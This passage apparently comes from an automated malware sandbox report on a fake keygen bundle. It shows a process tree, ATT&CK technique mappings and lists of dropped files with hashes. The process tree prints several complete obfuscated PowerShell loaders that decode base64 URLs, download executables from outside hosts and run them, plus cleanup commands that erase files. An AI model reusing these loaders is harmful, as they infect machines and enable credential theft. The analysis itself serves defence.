                      PID:2024
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Blocklisted process makes network request
                        • Loads dropped DLL
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:872
                        • C:\Users\Public\ihr.exe
                          "C:\Users\Public\ihr.exe"
                          5⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2556
                          • C:\Windows\SysWOW64\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                            6⤵
                            • Loads dropped DLL
                            PID:2476
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                              "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                              7⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of SetThreadContext
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2728
                              • C:\Windows\SysWOW64\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                                8⤵
                                • Loads dropped DLL
                                PID:932
                                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                  "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                  9⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of SetThreadContext
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2056
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:2520
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:896
                                  • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                    "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:1968
                              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                                "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                                8⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Checks processor information in registry
                                PID:2284
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2284 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\592810524586635\\* & exit
                                  9⤵
                                    PID:316
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /pid 2284
                                      10⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1912
                            • C:\Users\Public\ihr.exe
                              "C:\Users\Public\ihr.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:960
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\E6D6.tmp\b1.hta"
                        3⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of WriteProcessMemory
                        PID:1996
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1352
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout 2
                        3⤵
                        • Delays execution with timeout.exe
                        PID:2012
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\E6D6.tmp\ba.hta"
                        3⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of WriteProcessMemory
                        PID:1920
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                          4⤵
                          • Blocklisted process makes network request
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:912
                          • C:\Users\Public\rek.exe
                            "C:\Users\Public\rek.exe"
                            5⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: MapViewOfSection
                            • Suspicious use of SetWindowsHookEx
                            PID:2576
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                              6⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of SetThreadContext
                              • Suspicious behavior: MapViewOfSection
                              • Suspicious use of SetWindowsHookEx
                              PID:2704
                              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                                7⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Checks processor information in registry
                                PID:2932
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2932 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\617135328016142\\* & exit
                                  8⤵
                                    PID:3032
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /pid 2932
                                      9⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2856
                              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of SetThreadContext
                                • Suspicious behavior: MapViewOfSection
                                • Suspicious use of SetWindowsHookEx
                                PID:2776
                                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  PID:628
                              • C:\Users\Public\rek.exe
                                "C:\Users\Public\rek.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:2872
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\E6D6.tmp\ba1.hta"
                          3⤵
                          • Modifies Internet Explorer settings
                          • Suspicious use of WriteProcessMemory
                          PID:1964
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                            4⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1632

                    Network

                    MITRE ATT&CK Matrix ATT&CK v6

                    Persistence

                    Modify Existing Service

                    1
                    T1031

                    Registry Run Keys / Startup Folder

                    1
                    T1060

                    Defense Evasion

                    Modify Registry

                    6
                    T1112

                    Disabling Security Tools

                    2
                    T1089

                    Install Root Certificate

                    1
                    T1130

                    Credential Access

                    Credentials in Files

                    3
                    T1081

                    Discovery

                    Query Registry

                    2
                    T1012

                    System Information Discovery

                    2
                    T1082

                    Collection

                    Data from Local System

                    3
                    T1005

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\ProgramData\MSVCP140.dll
                    • C:\ProgramData\VCRUNTIME140.dll
                    • C:\ProgramData\freebl3.dll
                    • C:\ProgramData\mozglue.dll
                    • C:\ProgramData\mozglue.dll
                    • C:\ProgramData\msvcp140.dll
                    • C:\ProgramData\nss3.dll
                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • C:\ProgramData\nss3.dll
                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • C:\ProgramData\softokn3.dll
                    • C:\ProgramData\softokn3.dll
                    • C:\ProgramData\sqlite3.dll
                    • C:\ProgramData\sqlite3.dll
                    • C:\ProgramData\vcruntime140.dll
                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1a1733a9-c78a-41f9-ba49-7e78bc3e775b
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1d7cb86a-2252-4908-b9e5-02286ae725e8
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_478c05f3-b801-4912-91bd-47646e127596
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4fd4a7fe-82f5-41e4-888c-1b7eac83ece7
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5a433e48-2291-4cc8-aa45-244b7b08f427
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_602dbe9d-5dde-4a9e-8b89-7eca4d9bf5f7
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a2ebb337-3027-47ef-8098-8d2e9f7615cf
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bb9fdad8-3049-4c50-afcf-d6707e47b469
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca37ad88-4ce8-48e7-a2ed-ec10658dba29
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e10aa6dc-f3ff-45e4-9eec-4fef42847693
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1dd9aab-0fd1-4532-ba7f-00569c2741ef
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Temp\1r9Ud0xVX8.exe
                    • C:\Users\Admin\AppData\Local\Temp\1r9Ud0xVX8.exe
                    • C:\Users\Admin\AppData\Local\Temp\9q16E9MFse.exe
                    • C:\Users\Admin\AppData\Local\Temp\9q16E9MFse.exe
                    • C:\Users\Admin\AppData\Local\Temp\B6qMvGvaTD.exe
                      MD5

                      013db621a3351e3fb049efd2ccad79ff

                      SHA1

                      a23394ea54dbc5342a77938a2c285ee616185560

                      SHA256

                      df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                      SHA512

                      1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                    • C:\Users\Admin\AppData\Local\Temp\B6qMvGvaTD.exe
                      MD5

                      013db621a3351e3fb049efd2ccad79ff

                      SHA1

                      a23394ea54dbc5342a77938a2c285ee616185560

                      SHA256

                      df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                      SHA512

                      1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                    • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                    • C:\Users\Admin\AppData\Local\Temp\E6D6.tmp\Keygen.exe
                    • C:\Users\Admin\AppData\Local\Temp\E6D6.tmp\Keygen.exe
                    • C:\Users\Admin\AppData\Local\Temp\E6D6.tmp\b.hta
                    • C:\Users\Admin\AppData\Local\Temp\E6D6.tmp\b1.hta
                    • C:\Users\Admin\AppData\Local\Temp\E6D6.tmp\ba.hta
                    • C:\Users\Admin\AppData\Local\Temp\E6D6.tmp\ba1.hta
                    • C:\Users\Admin\AppData\Local\Temp\E6D6.tmp\m.hta
                    • C:\Users\Admin\AppData\Local\Temp\E6D6.tmp\m1.hta
                    • C:\Users\Admin\AppData\Local\Temp\E6D6.tmp\start.bat
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                    • C:\Users\Admin\AppData\Local\Temp\TSBpamNrNo.exe
                    • C:\Users\Admin\AppData\Local\Temp\TSBpamNrNo.exe
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                    • C:\Users\Public\Natso.bat
                    • C:\Users\Public\ihr.exe
                    • C:\Users\Public\ihr.exe
                    • C:\Users\Public\ihr.exe
                    • C:\Users\Public\rek.exe
                    • C:\Users\Public\rek.exe
                    • C:\Users\Public\rek.exe
                    • C:\Users\Public\xhe.exe
                    • C:\Users\Public\xhe.exe
                    • C:\Users\Public\xhe.exe
                    • C:\Windows\temp\alapxjj1.inf
                    • \??\PIPE\lsarpc
                    • \??\PIPE\srvsvc
                    • \??\PIPE\srvsvc
                    • \??\PIPE\srvsvc
                    • \ProgramData\mozglue.dll
                    • \ProgramData\mozglue.dll
                    • \ProgramData\mozglue.dll
                    • \ProgramData\msvcp140.dll
                    • \ProgramData\msvcp140.dll
                    • \ProgramData\msvcp140.dll
                    • \ProgramData\nss3.dll
                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • \ProgramData\nss3.dll
                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • \ProgramData\nss3.dll
                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • \ProgramData\sqlite3.dll
                    • \ProgramData\sqlite3.dll
                    • \ProgramData\sqlite3.dll
                    • \ProgramData\vcruntime140.dll
                    • \ProgramData\vcruntime140.dll
                    • \ProgramData\vcruntime140.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                      MD5

                      02cc7b8ee30056d5912de54f1bdfc219

                      SHA1

                      a6923da95705fb81e368ae48f93d28522ef552fb

                      SHA256

                      1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                      SHA512

                      0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
                    • \Users\Admin\AppData\LocalLow\sqlite3.dll
                    • \Users\Admin\AppData\Local\Temp\1r9Ud0xVX8.exe
                    • \Users\Admin\AppData\Local\Temp\9q16E9MFse.exe
                    • \Users\Admin\AppData\Local\Temp\B6qMvGvaTD.exe
                      MD5

                      013db621a3351e3fb049efd2ccad79ff

                      SHA1

                      a23394ea54dbc5342a77938a2c285ee616185560

                      SHA256

                      df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                      SHA512

                      1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                    • \Users\Admin\AppData\Local\Temp\E6D6.tmp\Keygen.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\TSBpamNrNo.exe
                    • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
